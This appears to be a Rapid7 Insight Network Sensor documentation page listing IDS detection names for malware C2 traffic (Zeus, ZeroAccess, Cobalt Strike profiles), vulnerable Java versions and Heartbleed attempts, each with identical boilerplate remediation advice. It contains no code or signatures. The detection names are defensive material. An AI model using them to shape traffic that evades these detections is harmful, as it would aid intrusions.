ET MALWARE ZeroAccess/Max++ Rootkit C&C Activity 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ZeroAccess P2P Module v6 Reporting

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ZeroLocker Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ZeroLocker Downloading Config

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zeus Bot Connectivity Check

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zeus Bot GET to Bing checking Internet connectivity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zeus Bot GET to Google checking Internet connectivity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zeus.Downloader Campaign Second Stage Executable Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zeus.Downloader Campaign Second Stage Executable Request 10/4/2014

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zeus.Downloader Campaign Unknown Initial CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Zeus GameOver Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zeus POST Request to CnC sk1 and bn1 post parameters

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ZeuS Post to C&C footer.php

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zeus User-Agent(z00sAgent)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zhelatin npopup Update Detected

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zlob Updating via HTTP

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zlob User Agent (securityinternet)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zlob User Agent - updating (internetsecurity)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zlob User Agent - updating (Winlogon)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zyklon CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET POLICY Java Client HTTP Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET POLICY Vulnerable Java Version 10.0.x Detected

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET POLICY Vulnerable Java Version 11.0.x Detected

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET POLICY Vulnerable Java Version 12.0.x Detected

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET POLICY Vulnerable Java Version 13.0.x Detected

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET POLICY Vulnerable Java Version 14.0.x Detected

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET POLICY Vulnerable Java Version 1.4.x Detected

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET POLICY Vulnerable Java Version 15.0.x Detected

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET POLICY Vulnerable Java Version 1.5.x Detected

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET POLICY Vulnerable Java Version 16.0.x Detected

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET POLICY Vulnerable Java Version 1.6.x Detected

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET POLICY Vulnerable Java Version 17.0.x Detected

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET POLICY Vulnerable Java Version 1.7.x Detected

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET POLICY Vulnerable Java Version 1.8.x Detected

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET POLICY Vulnerable Java Version 9.0.x Detected

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

RAPID7 TEST NTA IDS - rapid7.com/NetworkSensorIDSTest

Description

This detection is used to test if the Insight Network Sensor is functioning as intended.

Recommendation

This alert can be closed out.

RAPID7-TIDE Cobalt Strike Default SSL Certificate

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

RAPID7-TIDE Cobalt Strike Malleable C2 (Amazon GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

RAPID7-TIDE Cobalt Strike Malleable C2 (Amazon POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

RAPID7-TIDE Cobalt Strike Malleable C2 (Amazon Server GET Response)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

RAPID7-TIDE Cobalt Strike Malleable C2 (Amazon Server POST Response)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

RAPID7-TIDE Cobalt Strike Malleable C2 (Gmail GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

RAPID7-TIDE Cobalt Strike Malleable C2 (Gmail GET Response)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

RAPID7-TIDE Cobalt Strike Malleable C2 (Gmail POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

RAPID7-TIDE Cobalt Strike Malleable C2 (Gmail POST Response)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

RAPID7-TIDE Cobalt Strike Malleable C2 (Microsoft Update GET 1)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

RAPID7-TIDE Cobalt Strike Malleable C2 (Microsoft Update GET 2)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

RAPID7-TIDE Cobalt Strike Malleable C2 (Microsoft Update GET Response)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

RAPID7-TIDE Cobalt Strike Malleable C2 (SafeBrowsing GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

RAPID7-TIDE Cobalt Strike Malleable C2 (SafeBrowsing POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

RAPID7-TIDE Cobalt Strike Malleable C2 (SafeBrowsing Server Response)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

SURICATA TLS invalid encrypted heartbeat encountered, possible exploit attempt (heartbleed)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

SURICATA TLS invalid heartbeat encountered, possible exploit attempt (heartbleed)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

SURICATA TLS overflow heartbeat encountered, possible exploit attempt (heartbleed)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.